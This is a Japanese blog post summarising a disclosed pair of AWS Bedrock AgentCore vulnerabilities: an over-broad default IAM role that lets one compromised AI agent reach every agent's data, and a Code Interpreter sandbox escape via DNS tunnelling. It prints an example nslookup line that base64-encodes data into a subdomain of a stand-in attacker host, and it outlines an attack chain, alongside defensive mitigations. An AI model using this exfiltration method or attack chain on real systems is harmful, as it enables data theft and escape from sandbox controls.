「1つのAIエージェントが乗っ取られたら、全エージェントのデータが盗まれる」
これ、冗談じゃなくて、AWSの公式ツールで起きる現実の話です。
結論から言うと
2026年4月8日、Palo Alto NetworksのUnit 42チームがAWS Bedrock AgentCoreに潜む2つの重大な脆弱性を公開しました。
- Agent God Mode — デフォルト設定で全エージェントのデータにアクセス可能
- Sandbox Escape — DNS経由でデータを外部に持ち出し可能
「AWSだから安全」と思ってAIエージェントをデプロイしている方、今すぐ設定を見直してください。
脆弱性①:Agent God Mode — 全能の神になれるIAMロール
何が起きているのか
AWS Bedrock AgentCoreのスターターツールキットが自動生成するIAMロールに問題があります。
{
"Effect": "Allow",
"Action": [
"bedrock:InvokeAgentRuntime",
"bedrock:GetMemory",
"bedrock:RetrieveMemoryRecords",
"bedrock:InvokeCodeInterpreter"
],
"Resource": "*" // ← ここが問題
}
Resource: "*" — つまりワイルドカードです。
これにより、1つのエージェントが侵害されると:
- 全エージェントの会話履歴が閲覧可能
- ECRの全コンテナイメージをダウンロード可能
- 他エージェントのメモリデータにアクセス可能
- Code Interpreterを任意に実行可能
これは「バグ」ではなく「仕様」です。AWSはこれを「開発・テスト用の設定」と説明しています。
攻撃シナリオ
1. 攻撃者が1つのAIエージェントを侵害
↓
2. ECRから全コンテナイメージをダウンロード
↓
3. イメージからMemoryIDなどの設定情報を抽出
↓
4. 他エージェントのメモリにアクセス
↓
5. 顧客データ・機密情報を全て取得
たった1つのエージェントの侵害が、組織全体のAIインフラを崩壊させる。
脆弱性②:Sandbox Escape — DNSトンネリングでデータ流出
「サンドボックス」という名の幻想
「Code Interpreterはサンドボックスで隔離されているから安全」
そう思っていませんか?
Unit 42の研究者は、このサンドボックスをDNSトンネリングで突破できることを証明しました。
どうやって突破するのか
サンドボックスモードは多くのアウトバウンド通信をブロックしますが、DNS(AレコードとAAAAレコード)は許可しています。
攻撃者はこれを悪用:
# データをDNSサブドメインにエンコードして送信
nslookup $(echo "機密データ" | base64).attacker.com
実際に盗めたもの
研究者は概念実証で以下のデータを抽出することに成功:
- S3バケットの一覧と内容
- PII(個人識別情報)を含むCSVファイル
- APIキーが記載されたJSONファイル
- 機密性の高い財務データ
CVSSスコアは7.5〜8.1(High)と評価されています。
AWSの対応が衝撃的
- 2025年9月にHackerOne経由で報告
- AWSは問題を確認し、一時的な修正を適用
- その後、修正をロールバック
- 最終的に「修正しない」と決定
つまり、この脆弱性は今も存在しています。
今すぐやるべき対策
1. 本番環境でデフォルトIAMロールを使わない
// ❌ 絶対にダメ
"Resource": "*"
// ✅ 必ずリソースを限定
"Resource": "arn:aws:bedrock:us-east-1:123456789:agent/my-specific-agent"
2. VPCモードに移行する
サンドボックスモードではなく、VPCモードを使用:
- VPCエンドポイントで通信を制御
- セキュリティグループでアクセス制限
- Route 53 Resolver DNS Firewallで不審なDNSクエリをブロック
3. エージェントごとに別々のIAMロールを作成
# エージェントAのロール
agent-a-role → agent-aのリソースのみアクセス可能
# エージェントBのロール
agent-b-role → agent-bのリソースのみアクセス可能
4. ECRアクセスを必要なリポジトリに限定
{
"Effect": "Allow",
"Action": "ecr:GetDownloadUrlForLayer",
"Resource": "arn:aws:ecr:us-east-1:123456789:repository/my-agent-only"
}
なぜこれが重要なのか
2026年、AIエージェントは爆発的に普及しています:
- MCP(Model Context Protocol)が9700万インストール突破
- 40%の企業がAIエージェントを本番導入
- AIエージェントへのVC投資が2420億ドル
しかし、セキュリティは追いついていません。
先週発表された調査では:
企業の97%がAIエージェント関連のセキュリティ被害を予測
なのにセキュリティ予算はわずか6%
今回のAWS脆弱性は氷山の一角です。
タイムライン
| 日付 | イベント |
|---|---|
| 2025年9月 | Sandbox Escape をHackerOneに報告 |
| 2025年11月17日 | Agent God Mode をAWSに報告 |
| 2025年11月18日 | AWSが調査開始を確認 |
| 2025年12月14日 | AWSが追加情報を要求 |
| 2026年1月28日 | AWSが説明を提供(修正しない方針) |
| 2026年4月8日 | Unit 42が一般公開 |
まとめ
- Agent God Mode:デフォルトIAMロールでワイルドカード権限 → 全エージェントのデータが漏洩リスク
- Sandbox Escape:DNSトンネリングでサンドボックスを突破 → 機密データを外部に送信可能
- AWSの対応:「開発用の設定だから」と修正せず
- 対策:本番では必ずカスタムIAMロールとVPCモードを使用
「AWSだから安全」という神話は崩壊しました。
あなたのBedrock AgentCore環境、今すぐ確認してください。
参考リンク
Cracks in the Bedrock: Agent God Mode
Cracks in the Bedrock: Escaping the AWS AgentCore Sandbox
AWS Bedrock AgentCore Sandbox Bypass Enables Stealthy C2 and Data Exfiltration
この記事が参考になったらいいねとストックをお願いします!🙏
**あなたの組織ではAIエージェントのセキュリティ対策、どうしていますか?**コメントで教えてください👇